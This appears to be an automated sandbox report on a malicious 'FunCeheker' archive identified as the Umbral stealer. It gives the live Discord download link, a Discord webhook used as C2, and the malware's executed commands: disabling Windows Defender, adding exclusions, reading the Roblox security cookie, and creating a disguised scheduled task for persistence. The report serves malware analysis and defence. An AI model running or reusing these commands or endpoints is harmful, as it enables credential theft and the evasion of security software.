Analysis

  • max time kernel
    105s
  • max time network
    100s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-07-2024 10:49

General

  • Target

    https://cdn.discordapp.com/attachments/1266132249783435460/1266708240683761756/FunCeheker.zip?ex=66a6217a&is=66a4cffa&hm=3305d89aba28f6d48a64d9f909dd9821e8aa1930a7415657176035b06e7e827b&

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1266481582500483123/OqT52lSGTeY94sg6wFk2QYfeMnnDMrqXQ30WqY-aOddV3JIZ9oVD9RHheIHsNAlR5Vdn

Signatures

  • Detect Umbral payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Windows security bypass 2 TTPs 2 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1266132249783435460/1266708240683761756/FunCeheker.zip?ex=66a6217a&is=66a4cffa&hm=3305d89aba28f6d48a64d9f909dd9821e8aa1930a7415657176035b06e7e827b&
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3380
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd724f9758,0x7ffd724f9768,0x7ffd724f9778
      2⤵
        PID:4912
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1504 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:2
        2⤵
          PID:4132
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=284 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:8
          2⤵
            PID:3492
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2064 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:8
            2⤵
              PID:2796
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:1
              2⤵
                PID:1296
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3196 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:1
                2⤵
                  PID:4704
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:8
                  2⤵
                    PID:1080
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:8
                    2⤵
                      PID:3884
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:8
                      2⤵
                        PID:5028
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5372 --field-trial-handle=1756,i,16504410123825636580,14619277832829054098,131072 /prefetch:1
                        2⤵
                          PID:2564
                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                        1⤵
                          PID:1924
                        • C:\Windows\System32\rundll32.exe
                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                          1⤵
                            PID:3392
                          • C:\Program Files\7-Zip\7zFM.exe
                            "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\FunCeheker.zip"
                            1⤵
                            • Suspicious use of FindShellTrayWindow
                            PID:704
                          • C:\Users\Admin\Desktop\FunCeheker.exe
                            "C:\Users\Admin\Desktop\FunCeheker.exe"
                            1⤵
                            • Executes dropped EXE
                            PID:2584
                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                              "C:\Users\Admin\AppData\Local\Temp\2.exe"
                              2⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              PID:2904
                              • C:\Windows\SYSTEM32\attrib.exe
                                "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                3⤵
                                • Views/modifies file attributes
                                PID:5068
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2876
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:4296
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:4352
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                3⤵
                                  PID:2420
                                • C:\Windows\System32\Wbem\wmic.exe
                                  "wmic.exe" os get Caption
                                  3⤵
                                    PID:2284
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" computersystem get totalphysicalmemory
                                    3⤵
                                      PID:3420
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      "wmic.exe" csproduct get uuid
                                      3⤵
                                        PID:3068
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:1364
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        "wmic" path win32_VideoController get name
                                        3⤵
                                        • Detects videocard installed
                                        PID:3596
                                    • C:\Users\Admin\AppData\Local\Temp\1.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                      2⤵
                                      • UAC bypass
                                      • Windows security bypass
                                      • Event Triggered Execution: Image File Execution Options Injection
                                      • Executes dropped EXE
                                      • Windows security modification
                                      • Adds Run key to start application
                                      • Checks whether UAC is enabled
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • System policy modification
                                      PID:784
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /tn "GoogleUpdateTaskMachineUK" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\1.exe" /rl HIGHEST /f
                                        3⤵
                                          PID:3952
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1.exe'"
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:2668
                                    • C:\Windows\explorer.exe
                                      explorer.exe
                                      1⤵
                                        PID:2328

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\43c8fe8b-e97f-4ce3-b194-e3ca282e5fab.tmp

                                        Filesize

                                        136KB

                                        MD5

                                        39873511b703f0088e84c66f9eec980b

                                        SHA1

                                        4e348c57d811d2aa5aeb6ead0dd518fc0ffbb001

                                        SHA256

                                        be5e277b61ede5119d146b4a1cc7d82c4c64e1746fd8e35f923a8803a90817a4

                                        SHA512

                                        f31292e2edd36109707d6cb3003887c145203fe561a8dd5c0675112067e9262c191f85958d582a909f0e49d4d782adbf34f9c7076cf2b589d6b0ea1b5083a461

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                        Filesize

                                        20KB

                                        MD5

                                        b18fda83b12702570dad25f4aa2d5d09

                                        SHA1

                                        e162fba4c7577e3e83f9d761be7081fcef93d8d6

                                        SHA256

                                        4ba57b86352add3dd49d29922cde5d0ee65ff252a859bce0a87f432233eae035

                                        SHA512

                                        c5f9d2fb483aaff33fce026280532a6b0c6ee81e2a4b68dc4b65efa4483bb471872dbdcfd24b56ed084fb207ff5f57c20c61a09e2b4001a58f47c00a17b10848

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                        Filesize

                                        678B

                                        MD5

                                        9454e655b8ba3cb6e48f70e0a6545bad

                                        SHA1

                                        5a15f319b14d4dba35bc33352271bfae266aef7d

                                        SHA256

                                        1336e2628a8b50f80fd0150f6b4785b2ba77e3c8ea597b7a4a49725d9bf7ad54

                                        SHA512

                                        a6e4c93ac13fead260aaeb5e9d60250b7250e50fd219cdf1dd15265bb42becf48954ed9a446b1731ae73e81c9ee2f87325236a5fd993e67b345fc8d5d661107d

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                        Filesize

                                        1018B

                                        MD5

                                        31a7f4471e8a10c477933bf5266808c3

                                        SHA1

                                        f1a5281437f3b131c3b7f304a8026b0a1325bfb7

                                        SHA256

                                        6500d0529633071b3e308ada59b03691ce839002080f49a1b7d304355b9a1e11

                                        SHA512

                                        53da556a7277308c7b7456944632c209a87adecca351fd1afc7afb135cfde79b2b62d3ecdf25a5f2b61ee85a1047689db2c221a9e8abd371f1596d55ce69c761

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        5KB

                                        MD5

                                        862ae1da563f0623f2f615737f2756e4

                                        SHA1

                                        8e16344c4673598661934accf64f398f81c7c85a

                                        SHA256

                                        408ab46138452bafd23cb5b8b03446b880010d1a73e23f7d0d336a8b3a70e8d1

                                        SHA512

                                        622957b1e17929f5ccc504df67c8f6b85796a8426e5f665a2582225f74ec9494766675818c152368198635f2718e99b3471c8e63ce674e6826b856133f73c0cd

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        5KB

                                        MD5

                                        e7aca4818f6cd3cfff97a2b17844f914

                                        SHA1

                                        1cbbcbfc6d9aff44ac41838acb361def46327823

                                        SHA256

                                        79392c7182353be91fcee7912fde7da6880cf27c0fd97ab0d1918bcbf532ea43

                                        SHA512

                                        87faff0fa77403e3ecbee64e6340a350005e5df59ace99e528dc4922b923e6a647befaeb7f99c6f5b056140a03e2030908a68245d63a1988fe05d5f7f1f78e99

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        5KB

                                        MD5

                                        c0e314a868d51a64aece33f53f090433

                                        SHA1

                                        f1d5a218fdb2bad8b3a3db1ab4bbfe1e066593a1

                                        SHA256

                                        6b4f7301c7954760c8faeced9f6bfb1ec10cf31691fc9663a661f898c23fee8f

                                        SHA512

                                        eab60a6649f1d62ff6f1b2645a15406c61198220ec2e259ceda8dbc61f598bbcfc70719f4b8853cca92fe0d0cc86ad4f29e1b53657c771f7550bc500657b11f5

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                        Filesize

                                        6KB

                                        MD5

                                        989e89571a73f86bb5231d1038830aaf

                                        SHA1

                                        29a5c0977b50b4605cacf8089feaf1110aa84db2

                                        SHA256

                                        8a7ef2d7507dae31fafdcfccb013fdc7c1d5ff1981567097c3e85fb0efb25b95

                                        SHA512

                                        0893feaa714b19ef23ee4eac43443c58b7c204d100d6a1a0af15b8d032f688085978a05a83a1363c6c7c416bd2d0885f1d71cb085eeea413e405169a6ae117d3

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

                                        Filesize

                                        8KB

                                        MD5

                                        ad3276982e5be1e8f555d28af38a9911

                                        SHA1

                                        6fff520e7cba1728275cfc0e85f1881b904dd418

                                        SHA256

                                        28f9e207ab2bb36f72e3d9dce6b2aba62b69eb782afe7f06f2ce8fd5a491ba85

                                        SHA512

                                        9fdf5c94763d05d264216dfa5fd6f48ab1ecd8b39a1f499294c44d32cfb1fdf71959a92bd6d5cf5f4a1eb3ac22d562f817964ce296447ee028252b8204f7353d

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                        Filesize

                                        2B

                                        MD5

                                        99914b932bd37a50b983c5e7c90ae93b

                                        SHA1

                                        bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                        SHA256

                                        44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                        SHA512

                                        27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                        Filesize

                                        3KB

                                        MD5

                                        8592ba100a78835a6b94d5949e13dfc1

                                        SHA1

                                        63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                        SHA256

                                        fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                        SHA512

                                        87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        59f8d2dbde8db1c151b4731b680a7b0e

                                        SHA1

                                        44679f82f9b31f5cdbf2e7418a184628a409ca2e

                                        SHA256

                                        7cd3f26eec41872dadbd881d0a693c8d857a546563ab4b998a29b98002f8f71f

                                        SHA512

                                        05c47dc49f0f05e62ba202e6de78785cd72a8a557d2152c293d007bfed80e224898226b95c4f8ca6c59ca4b02748a335308d31c5ca4c57da91a64c38f9c97706

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        607ed28f1bf9698c0598650fc449ce01

                                        SHA1

                                        2cea2218c8a808b4d287695811a7e10331c23337

                                        SHA256

                                        6d7929f9a595dbb9dc5da4c60728a5592dfe81d5e531329cd592d93539c190da

                                        SHA512

                                        3ba334a1cbd62c6cfd3e9f81eee7e75502bcd6c721f55590d22cbcb232dd89be0cf2efcf43d4d6fbb956b6b3a119e96abfed15a9002f78b4a0f3df0cf5598fc5

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        8fdcc2016b4f2719af0be71c6005deee

                                        SHA1

                                        f4782c29e31949e663997e789a05b1772e772f4d

                                        SHA256

                                        ef6059785fe6117f8789ab3cf4cafef92a09c974d0d5311d0df25cbf6b422275

                                        SHA512

                                        38846eafee9078e3f22a148c5b726489e4910b8730e732da3fce2df3e583cb600a90a01d4838869fe96fefb2331b6a06e8d53dddc1da11c747e745558a98fef0

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        7c66f46e7873f0ce06ec961e1c002ca4

                                        SHA1

                                        d76414c1116a8180edc9d79ceda47690f1fd242f

                                        SHA256

                                        de59ba39a5dc849779bb0f6a53942efe1001fab83537636c9134ca6aee9f2f94

                                        SHA512

                                        da2089791ab0b419fd352f72dfa257a94bc204cbd75e9f50e6bbbc961b1acb5dc3e15ef5781c69b88a7f0550c639a2039ea5c931d261bbabd485db171a82da1e

                                      • C:\Users\Admin\AppData\Local\Temp\1.exe

                                        Filesize

                                        444KB

                                        MD5

                                        c4c11e78b3be02ca5f57d43056479ba9

                                        SHA1

                                        a22e626b1cec7b77a8261073e95748003a80608e

                                        SHA256

                                        e45ff6bfc22ff5b0a7301baa59e2f4c909a1b152658a42ebee8be297ad32f6dd

                                        SHA512

                                        c86f9ffc871f390d829e2b537f55429350790b02fa8dc72e440fa04cff7e29ee93c9dcde8f6197f2c3ab776036bf30104ffda5cd150fe4720fca303cf57161a7

                                      • C:\Users\Admin\AppData\Local\Temp\2.exe

                                        Filesize

                                        229KB

                                        MD5

                                        c43dea8d21e34876d9095a0dc717f783

                                        SHA1

                                        f1d20721705516a91db18f69a88b804cd88e3e82

                                        SHA256

                                        fb35637a1673c9f92154c37e63f73442039e42fe7f5762baab295e01f33f14de

                                        SHA512

                                        3c5cf96ff4fdbce087a56c1d8ba7c6c7cc09ab2220b4b848cf207db558efe41adbdb2366ac1f1a7084a14aa3d6d6d9cc3f82df1fc1eb324c5e98cc5a1f64bbc9

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qr3pdqhg.eij.ps1

                                        Filesize

                                        1B

                                        MD5

                                        c4ca4238a0b923820dcc509a6f75849b

                                        SHA1

                                        356a192b7913b04c54574d18c28d46e6395428ab

                                        SHA256

                                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                        SHA512

                                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                      • C:\Users\Admin\Desktop\FunCeheker.exe

                                        Filesize

                                        537KB

                                        MD5

                                        667aae32601dfc30320436672c4befa7

                                        SHA1

                                        4ad741c5b0195a5279ba7379985b5ed5624b03fb

                                        SHA256

                                        7dd25762fcacf179754891cb81c0264e7390f83da2dc973af1568fb853739565

                                        SHA512

                                        a165b62d2cf107ea1490c53589357e3909aa27c0495078bb119920510a61e7e9ecc1a8ad13e067148755182d2db33ce72bbb7317b51967dbe5ef8805d3d1b2bb

                                      • C:\Users\Admin\Downloads\FunCeheker.zip.crdownload

                                        Filesize

                                        537KB

                                        MD5

                                        9f4efc4d52fcea4158eb8003b46397e4

                                        SHA1

                                        9f1de6c9e1417d322a446f4e349e141d77ccbc45

                                        SHA256

                                        a200b82a033775aba498a74a6b65a8ae6f64a8556d9b541c8c00e713f33119e0

                                        SHA512

                                        679f81826a5b38bfc12423a29a6d10f6fe8ec82f3a550d45c922c05fb87123234b2e11343077577d62dddb429082899c240a01ad04948b6c10aefeed6a84ea68

                                      • C:\Windows\system32\drivers\etc\hosts

                                        Filesize

                                        2KB

                                        MD5

                                        577f27e6d74bd8c5b7b0371f2b1e991c

                                        SHA1

                                        b334ccfe13792f82b698960cceaee2e690b85528

                                        SHA256

                                        0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

                                        SHA512

                                        944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

                                      • memory/784-84-0x0000000000400000-0x0000000000597000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/784-430-0x0000000000400000-0x0000000000597000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/784-421-0x0000000000400000-0x0000000000597000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/784-307-0x0000000000400000-0x0000000000597000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/784-406-0x0000000000400000-0x0000000000597000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/784-385-0x0000000000400000-0x0000000000597000-memory.dmp

                                        Filesize

                                        1.6MB

                                      • memory/2584-71-0x0000000000AA0000-0x0000000000B2C000-memory.dmp

                                        Filesize

                                        560KB

                                      • memory/2876-102-0x00000254F3BA0000-0x00000254F3C16000-memory.dmp

                                        Filesize

                                        472KB

                                      • memory/2876-99-0x00000254F2BB0000-0x00000254F2BD2000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/2904-79-0x000001AF8C6A0000-0x000001AF8C6E0000-memory.dmp

                                        Filesize

                                        256KB

                                      • memory/2904-324-0x000001AF8E4C0000-0x000001AF8E4D2000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/2904-323-0x000001AF8E420000-0x000001AF8E42A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/2904-233-0x000001AF8E470000-0x000001AF8E4C0000-memory.dmp

                                        Filesize

                                        320KB

                                      • memory/2904-236-0x000001AF8E400000-0x000001AF8E41E000-memory.dmp

                                        Filesize

                                        120KB